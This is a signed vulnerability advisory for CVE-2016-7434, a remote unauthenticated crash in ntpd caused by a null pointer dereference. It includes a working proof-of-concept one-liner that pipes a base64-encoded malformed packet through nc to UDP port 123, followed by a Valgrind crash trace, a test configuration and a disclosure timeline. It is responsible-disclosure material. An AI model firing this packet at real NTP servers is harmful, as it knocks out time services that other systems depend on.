ntpd 4.2.7.p22 / 4.3.0 Denial Of Service

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
CVE-2016-7434 ntpd remote pre-auth Denial of Service  
  
+----------------------------------------------------------------------------------------------+  
Affected: ntp-4.2.7p22, up to but not including ntp-4.2.8p9,  
and ntp-4.3.0 up to, but not including ntp-4.3.94  
Credit: Magnus Klaaborg Stubman (@magnusstubman)  
Bug report: http://bugs.ntp.org/show_bug.cgi?id=3082  
  
The vulnerability allow unauthenticated users to crash ntpd with  
a single malformed UDP packet, which cause a null pointer dereference.  
  
  
+-Proof of concept exploit---------------------------------------------------------------------+  
| echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"\ |  
| "WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" | base64 -d | nc -u -v 127.0.0.1 123 |  
+-------------------------------------------+-----------+--------------------------------------+  
  
  
+-Valgrind report------------------------------------------------------------------------------+  
| $ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf |  
| ==5389== Memcheck, a memory error detector |  
| ==5389== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. |  
| ==5389== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info |  
| ==5389== Command: ./ntpd/ntpd -n -c /home/dude/resources/ntp.conf |  
| ==5389== |  
| 25 Jun 23:07:05 ntpd[5389]: ntpd [email protected] Sat Jun 25 20:50:30 UTC 2016 (1): Starting |  
| 25 Jun 23:07:05 ntpd[5389]: Command line: ./ntpd/ntpd -n -c /home/dude/resources/ntp.conf |  
| 25 Jun 23:07:06 ntpd[5389]: proto: precision = 3.605 usec (-18) |  
| 25 Jun 23:07:06 ntpd[5389]: switching logging to file /dev/null |  
| 25 Jun 23:07:06 ntpd[5389]: Listen and drop on 0 ^6wildcard [::]:123 |  
| 25 Jun 23:07:06 ntpd[5389]: Listen and drop on 1 v4wildcard 0.0.0.0:123 |  
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 2 lo 127.0.0.1:123 |  
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 3 eth0 10.0.1.11:123 |  
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 4 eth0:0 1.2.3.4:123 |  
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 5 eth9:0 11.11.11.11:123 |  
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 6 lo [::1]:123 |  
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 7 eth0 [fe80::f2de:f1ff:fe85:75cf%2]:123 |  
| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 8 eth9 [fe80::a450:8eff:fecc:9c4%3]:123 |  
| 25 Jun 23:07:06 ntpd[5389]: Listening on routing socket on fd #25 for interface updates |  
| ==5389== Invalid read of size 1 |  
| ==5389== at 0x4C2C1A2: strlen (vg_replace_strmem.c:412) |  
| ==5389== by 0x45704D: estrdup_impl (emalloc.c:128) |  
| ==5389== by 0x41AF29: read_mru_list (ntp_control.c:4041) |  
| ==5389== by 0x42BB09: receive (ntp_proto.c:659) |  
| ==5389== by 0x4145CF: ntpdmain (ntpd.c:1329) |  
| ==5389== by 0x405A58: main (ntpd.c:392) |  
| ==5389== Address 0x0 is not stack'd, malloc'd or (recently) free'd |  
| ==5389== |  
| ==5389== |  
| ==5389== Process terminating with default action of signal 11 (SIGSEGV) |  
| ==5389== Access not within mapped region at address 0x0 |  
| ==5389== at 0x4C2C1A2: strlen (vg_replace_strmem.c:412) |  
| ==5389== by 0x45704D: estrdup_impl (emalloc.c:128) |  
| ==5389== by 0x41AF29: read_mru_list (ntp_control.c:4041) |  
| ==5389== by 0x42BB09: receive (ntp_proto.c:659) |  
| ==5389== by 0x4145CF: ntpdmain (ntpd.c:1329) |  
| ==5389== by 0x405A58: main (ntpd.c:392) |  
| ==5389== If you believe this happened as a result of a stack |  
| ==5389== overflow in your program's main thread (unlikely but |  
| ==5389== possible), you can try to increase the size of the |  
| ==5389== main thread stack using the --main-stacksize= flag. |  
| ==5389== The main thread stack size used in this run was 204800. |  
| ==5389== |  
| ==5389== HEAP SUMMARY: |  
| ==5389== in use at exit: 122,458 bytes in 2,707 blocks |  
| ==5389== total heap usage: 2,875 allocs, 168 frees, 411,190 bytes allocated |  
| ==5389== |  
| ==5389== LEAK SUMMARY: |  
| ==5389== definitely lost: 0 bytes in 0 blocks |  
| ==5389== indirectly lost: 0 bytes in 0 blocks |  
| ==5389== possibly lost: 2,000 bytes in 2 blocks |  
| ==5389== still reachable: 120,458 bytes in 2,705 blocks |  
| ==5389== suppressed: 0 bytes in 0 blocks |  
| ==5389== Rerun with --leak-check=full to see details of leaked memory |  
| ==5389== |  
| ==5389== For counts of detected and suppressed errors, rerun with: -> |  
| ==5389== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) |  
+----------------------------------------------------------------------------------------------+  
  
+-ntp.conf-------------------------------------------------------------------------------------+  
| server 127.127.1.0 prefer |  
| fudge 127.127.1.0 stratum 10 |  
| driftfile /var/lib/ntp/drift |  
| broadcastdelay 0.008 |  
| |  
| logfile /dev/null |  
| |  
| restrict 127.0.0.1 mask 255.255.255.255 nomodify notrap |  
+----------------------------------------------------------------------------------------------+  
  
+-Timeline-------------------------------------------------------------------------------------+  
| 2016-06-24 Discovery |  
| 2016-06-26 Vendor notification |  
| 2016-06-26 Vendor acknowledge that the report has been received |  
| 2016-06-28 Vendor confirms the issue |  
| 2016-09-29 Vendor provides patch for verification |  
| 2016-10-01 Researcher acknowledge that the patch mitigates the issue |  
| 2016-11-21 Public disclosure |  
+----------------------------------------------------------------------------------------------+  
  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: Keybase OpenPGP v2.0.58  
Comment: https://keybase.io/crypto  
  
wsFcBAABCgAGBQJYMxbbAAoJEK2PVr7jZKXX0McP/29cApDVlvlsVdNnv9jmlza3  
J+69CaitlDpqW4+zpQY12WmajvCOhcCTsjhkNoXcsOQqlVB9WlUyqY9fcyPpDIUi  
uSF/ILj59Ds0oD4zFnr4O3BS6u/8jcdqqepc6PzljlWYItF58gTpYOw7aD9FoKcm  
x+qTXBJ/dTgzGI6eNUFn9clwef1KcqEz9yS/3d/zQme6eBb68y1wqwFarzE/TYNq  
a1tbQ6Dg7A12pAwjCfpWw4QLFPuLQ3NJBFtVmnOrQd7O/rDZL9wDbZpCj8d7nyln  
AkMBXN2K/fvwX1tXvicmdN9XfTQX2kYCDG9cd0r+NsPu45rCN/Zpy8vHcJCBazFg  
bZbBAjDozh8k2KgEbmeKtk1sL+UVobewf2n6+N86ybmCeUbcY7snffwrTuNLqZyf  
QlFrB4h2D1NVF7UljqmzmC0xlEXdY/Vtss0a+tmLKUZh4Z6VA66mT3F5QUW+I6nf  
4GrMaZkpRALQ2uyS1Ngi6Ayyh9Pq2jkyUFXKUHNXTpjEfWmv42wKwzDG3rM3xnkF  
nZtCf/r0ycS6dHWX51x2W2jltKs+EtlMWSCBMya40xRG4XPJrXEuE2lFw6veYEWe  
yOXbdEtchEWfY8wVHWeKSz5GmmGXmXP9BcIQwSKfOC6WqMDI/Sy66KM7tORnGxH6  
0totTYIqpaN1YHDCA0LT  
=9jkx  
-----END PGP SIGNATURE-----  
  
  
  
`